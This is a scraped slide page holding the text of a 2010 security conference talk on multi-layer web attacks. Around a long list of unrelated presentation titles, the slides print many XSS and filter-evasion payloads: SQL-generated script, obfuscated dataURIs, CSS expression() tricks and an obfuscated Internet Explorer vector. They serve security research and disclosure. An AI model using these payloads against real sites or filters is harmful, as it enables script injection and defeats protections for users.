2 Roads to Redemption - Thoughts on XSS and SQLIA2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIAguestfdcb8a
 
(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS UniverseStefano Di Paola
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines José Ignacio
 
You Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing It
You Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing ItYou Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing It
You Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing ItAleksandr Yampolskiy
 
The Wondrous Curse of Interoperability
The Wondrous Curse of InteroperabilityThe Wondrous Curse of Interoperability
The Wondrous Curse of InteroperabilitySteve Loughran
 
NoSQL - No Security?
NoSQL - No Security?NoSQL - No Security?
NoSQL - No Security?Gavin Holt
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
CVE 2012-1889 Microsoft XML core services uninitialized memory vulnerability
CVE 2012-1889 Microsoft XML core services uninitialized memory vulnerabilityCVE 2012-1889 Microsoft XML core services uninitialized memory vulnerability
CVE 2012-1889 Microsoft XML core services uninitialized memory vulnerabilityHigh-Tech Bridge SA (HTBridge)
 
Icinga Director and vSphereDB - how they play together - Icinga Camp Zurich 2019
Icinga Director and vSphereDB - how they play together - Icinga Camp Zurich 2019Icinga Director and vSphereDB - how they play together - Icinga Camp Zurich 2019
Icinga Director and vSphereDB - how they play together - Icinga Camp Zurich 2019Icinga
 
MunichJS - 2011-04-06
MunichJS - 2011-04-06MunichJS - 2011-04-06
MunichJS - 2011-04-06Mike West
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientAngelo Dell'Aera
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
 
Web開発の技術選び、 好き嫌いでやってませんか 〜技術選びで注目すべきポイントとは〜
Web開発の技術選び、 好き嫌いでやってませんか 〜技術選びで注目すべきポイントとは〜Web開発の技術選び、 好き嫌いでやってませんか 〜技術選びで注目すべきポイントとは〜
Web開発の技術選び、 好き嫌いでやってませんか 〜技術選びで注目すべきポイントとは〜Yuki Okada
 
Original slides from Ryan Dahl's NodeJs intro talk
Original slides from Ryan Dahl's NodeJs intro talkOriginal slides from Ryan Dahl's NodeJs intro talk
Original slides from Ryan Dahl's NodeJs intro talkAarti Parikh
 
Real World Single Page App - A Knockout Case Study
Real World Single Page App - A Knockout Case StudyReal World Single Page App - A Knockout Case Study
Real World Single Page App - A Knockout Case Studyhousecor
 

Similar a Future of Web Attacks: Multi-Layer Attacks, XSSQLI+ and HTML5 (20)

Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007
 
2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA
 
(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines
 
You Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing It
You Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing ItYou Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing It
You Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing It
 
The Wondrous Curse of Interoperability
The Wondrous Curse of InteroperabilityThe Wondrous Curse of Interoperability
The Wondrous Curse of Interoperability
 
NoSQL - No Security?
NoSQL - No Security?NoSQL - No Security?
NoSQL - No Security?
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
CVE 2012-1889 Microsoft XML core services uninitialized memory vulnerability
CVE 2012-1889 Microsoft XML core services uninitialized memory vulnerabilityCVE 2012-1889 Microsoft XML core services uninitialized memory vulnerability
CVE 2012-1889 Microsoft XML core services uninitialized memory vulnerability
 
Icinga Director and vSphereDB - how they play together - Icinga Camp Zurich 2019
Icinga Director and vSphereDB - how they play together - Icinga Camp Zurich 2019Icinga Director and vSphereDB - how they play together - Icinga Camp Zurich 2019
Icinga Director and vSphereDB - how they play together - Icinga Camp Zurich 2019
 
MunichJS - 2011-04-06
MunichJS - 2011-04-06MunichJS - 2011-04-06
MunichJS - 2011-04-06
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclient
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
Web開発の技術選び、 好き嫌いでやってませんか 〜技術選びで注目すべきポイントとは〜
Web開発の技術選び、 好き嫌いでやってませんか 〜技術選びで注目すべきポイントとは〜Web開発の技術選び、 好き嫌いでやってませんか 〜技術選びで注目すべきポイントとは〜
Web開発の技術選び、 好き嫌いでやってませんか 〜技術選びで注目すべきポイントとは〜
 
Original slides from Ryan Dahl's NodeJs intro talk
Original slides from Ryan Dahl's NodeJs intro talkOriginal slides from Ryan Dahl's NodeJs intro talk
Original slides from Ryan Dahl's NodeJs intro talk
 
Real World Single Page App - A Knockout Case Study
Real World Single Page App - A Knockout Case StudyReal World Single Page App - A Knockout Case Study
Real World Single Page App - A Knockout Case Study
 

Último

Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesZilliz
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 

Último (20)

DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector Databases
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 

Future of Web Attacks: Multi-Layer Attacks, XSSQLI+ and HTML5

  • 1. The Presence and Future of Web Attacks Multi-Layer Attacks, XSSQLI+ and HTML5 A presentation by Mario Heiderich for CONFidence 2010, Krakow
  • 2. WARNING This talk will be technical, chaotic and|or hurt
  • 3. Intro Mario Heiderich @0x6D6172696F  Based in Cologne  CTO for Business IN Inc - working on workube.com  Independent Security Researcher  PHPIDS and something we will see later on
  • 4. Why this talk?  What happened to web application security?  Always the same... so 2002 right?  XSS, SQL Injections, Auth and path traversal  We have amazing things now!  NoScript, the IE8 and Chromium XSS filter and CSP  Users must be safer than ever!  But didn't the web change?  Wasn't there HTML5 and next generation browsers?
  • 5. Oh wait - developers!  Web app development frameworks help  Building applications faster  Pre-implemented SQLI and XSS protection  Secure forms with complex CSRF tokens  Webroot contains webroot only files  Weaknesses regarding JavaScript generation  Client side logic mostly built manually  Different templates for browsers, mobile devices, feeds  Offline mode, client side validation, DOM access
  • 6. User Agents on steroids  Chrome 5 and Opera 10.5 ship client side databases  IE9 is coming soon with more standards conformity  Integrated security mechanisms  The death of eval()  A fat client dynasty is coming up  Who needs a server anyway if clients do all the work  And store their data in „the cloud“   Bye bye SQL - say hello to NoSQL?
  • 7. Web applications are changing  And so are the attacks against them  If the attack happens on and against the client  Of what use will a server side IDS / WAF solution be?  Today we can have a little preview for that scenario  One question might be...  How will protective mechanisms react on multi-layer attacks?
  • 8. Multi-layer what?  What about utilizing the DBMS to generate an XSS attack  NoScript detects most XSS attacks without problems  Circumvention has become very difficult  Thanks to Giorgio Maone and the NoScript user base. And me :P  Let's have a look at my last one (disclosed via SSD - fixed in 1.9.9.48)  Aren't dataURIs the sweetest thing?  <a href="d&#097t&#x0061: . &#x2c &#x25;  3  c s cri &#x00D; pt % 3 e alu0065rt(1)%3c  /s &#x43 RI &#x009 P t>"
  • 9. Difficult!  We can probably agree that it's not as easy anymore  Same thing for the IE8 XSS filter  Or implementations of toStaticHTML()  Most quirky JavaScript encoding techniques are documented  Not too many user agent specific surprises anymore    Help from another layer would be appreciated  Let's have a look at a "classic webapp" example
  • 10. Imagine the DBMS helps  Hypothesis  A verbose SQL Injection vulnerability is always at least an "unfilterable" XSS  Verification  Just make use of the obfuscation possibilities the DBMS provides  SELECT 0x3C7363726970743E616C6572742831293C2F7363726970743E  SELECT UpdateXML(concat( 0x3c,'script',0x3e,'alert(1)',0x3c,'/ script',0x3e), '/x', 0);  SELECT/**/'<sc'"rip"'t>al'"er"'t(1)'"</sc"'ript>'
  • 11. MySQL and PostgreSQL  MySQL only ships two basic XML functions  UpdateXML() and ExtractValue()  PostgreSQL has far more advanced XML support  SELECT xmlelement(name img,xmlattributes(1 as src,'alert(1)'as onerror))  SELECT xmlforest(loWER('x41'||'lert(1)') AS script);  And my favorite  SELECT xpath('//text()', '<x:x>&#x3c;imgx20src=x onerror=alert(1);&#x2f;&#x2f;</x:x>', ARRAY[ARRAY['x', '']]);
  • 12. SQL Injection and XSS  There are more intersections for XSS and SQLI  „Remember“ the client side databases?  And the short lived Google Gears?  HTML5 and W3C Offline Web Applications 1.0 give us window.openDatabase()  SQL execution on the user agent  Currently supported by Chrome and Opera  Usually implemented using SQLite
  • 13. Code please <script type="text/javascript"> openDatabase('',1,1,0).transaction(function($){ $.executeSql( 'SELECT "x61lert(1u0029"', [], function($,results){ for(i in results.rows.item(0)) eval(results.rows.item(0)[i]) }) }) </script>  Selects the string "alert(1)"  And evaluates the result
  • 14. Short Roundup  The browsers speak SQL now  The server side DBMS can generate HTML and JavaScript  We already outsmarted NoScript and IE8 XSS filter  Not really a fair game though  Multi-layer attacks mean multi-layer obfuscation  In future webapps the client side DBMS will generate our XSS payload     But today we still have to trick the server side protection  Bypass IDS and WAF with a trigger
  • 15. Attackers like obfuscation  And why wouldn't they - right?  Obfuscation usually means concatenation  And a bit of encoding spice  But how to concatenate in SQL so no one will notice the attack?  Which operator to choose?  Everybody knows chr(), char() and double-pipe...
  • 16. In MySQL - none at all  MySQL doesn't need parenthesis to concatenate  And doesn't know the double-pipe operator  Sorry mod_security...  But luckily MySQL accepts concatenation via whitespace  SELECT "a" "d" "m" "i" "n"  SELECT'a'"d"'m'"i"'n'  Or why not use an integer overflow in char()  SELECT concat( char( x'70617373', b'1110111011011110111001001100100'))
  • 17. So again...  We can bypass the server side protection mechanisms  As well as client side tools  No parenthesis or special operators needed on MySQL  We can also trick MySQL and the IDS with MySQL specific code  SELECT--/*!500005,*//*!400004,*//*!300003,*/
  • 18. Back to the user agent  But what if no server side DBMS is involved in the attack  What if the client side database is being targeted  We still need to execute some JavaScript bypassing either server side IDS and the client side security mechanisms  Let's have a look at some freaky examples
  • 19. Remember dataURIs?  The whole requested resource embedded in the URI  DataURIs work smoothly on Firefox, Opera and Chrome  But IE8 and 9 have problems  Some say the minimal dataURI support was just for ACID 2
  • 20. People say...  ...it's not possible to execute JavaScript via dataURI on IE  Do we agree on that?  No we don't!  <style> @import "data:,*%7bx:expression(write(2))%7D"; </style>  <link rel="Stylesheet" href="data:,* %7bx:expression(write(4))%7d">
  • 21. And there's more  CSS expression() is believed to be dead on IE8  But it isn't  It's only disabled in standard mode  In case a recognized DOCTYPE is present  The new HTML5 doctype isn't  So this works: <!docytpe html> <div style="background:url('abc', x!=x=expression(write(2));)">
  • 22. And even worse...  HTML5 forces user agents to be more tolerant again  New tags, new attributes, new parsing rules  And tons of new features like the mentioned openDatabase()  Some nifty examples from the future  <video/poster=javascript:alert(1)// Opera 10.5+  <style>@import javascript:alert(1); // IE9 (!)
  • 23. Closing tags + free 0day  Another weird artifact has been reported for IE6 some years ago  It's attributes in closing HTML tags  Believed to be dead... but  This still works on all IEs  <td>phoobar</td style=expression(write(1))>  And what about this?  <style>*{background:url(foo!!- =expression(write(1));</style>
  • 24. Opera CSS XSS  Since Mozilla fixed the dataURI and cross domain problems with -moz-binding IE was believed to be unique  Unique regarding JavaScript execution via CSS  But Opera ships an artifact too  <style>*{-o-link:'javascript:alert(1)';-o-link- source:current}</style>
  • 25. Now we have...  Server side SQL helping to circumvent client side XSS filters  Effective SQL obfuscation circumventing WAF and IDS  "Obfuscation-mash ups" using several layers  Quirky HTML triggers to execute the JS  Sounds like only one player is missing  Even more freaky markup obfuscation! Awesome! Now breathe..
  • 26. Meet Harold the markup ghoul This is Harold: 1;--<?f><l ₩ :!!:x /style=`b&#x5c;65h0061vIor/ĸ :url(#def&#x61ult#time2)ö/';'` ₩ /onb egin= &#x5bµ=u00&#054;1le&#114t&#40&#x31)&# x5d&#x2f/&#xyŧ>  It's completely legitimate to call me a mad man now and say this is never gonna work  So - demo time: http://heideri.ch/jso/what???
  • 27. What... what is this?  It's a piece of markup – obfuscated to the max  Working on IE only – but all versions from 5 to 9  Based on the HTML+TIME API (What? Stuff like that still exists?)  Does your WAF know what to do with it?  Overall about 12-13 obfuscation steps  Buy me a beer later on and I will give you a full explanation :D
  • 28. Round Up  We are not living in web app = CRUD application times anymore  Modern webapps accept input from many channels  User input via HTTP is just one of them  API calls, RPC, DOM, Drag&Drop, file meta data & EXIF...  WAF/IDS as well as pentesters need to look into HTML5  New application structures and design pattern must be understood  Client and server versus rich-client and cloud  SQLite and NVP versus RDBMS  Massive client diversity via mobile devices
  • 29. Expectations and tasks  Fewer basic and reflective XSS  More out-of-band attacks and heavy obfuscation  We didn't even cover Flash and PDF  More JSON and E4X hijacking  SVG based attacks and rogue multimedia objects  Don't ignore the user agent  Understand client side obfuscation and multi-layer obfuscation  Don't trust filters. Ever.  We broke HTMLPurifier and most other markup filters some days ago with one single vector  And don't trust the cloud – it's a business model and not your buddy :D
  • 30. So what can I do?  Help with research and participation!  Communication and disclosure  For good!  But how?
  • 31. The Ultimate Cheatsheet  http://heideri.ch/jso
  • 32. Ping us!  Add new vectors  Get a channel to speak to vendors  Most are more responsive than one might think  Use it for..  Your own scanner software  Your own local version  Whatever you want!  Open API in JSON  Multiple languages  Flexible payload  You need more? Tell us!
  • 33. Do what now?  Go here!  http://code.google.com/p/html5security/
  • 34. Questions & Comments  Thanks very much for listening!  Wait - no goodies this time? Meh!!1
  • 35. Yaaaaaaay! Goodies!  Did you know Firefox has a DOM object called crypto?  PKI meets JavaScript  And another eval() for free!  crypto.generateCRMFRequest( 'CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use' );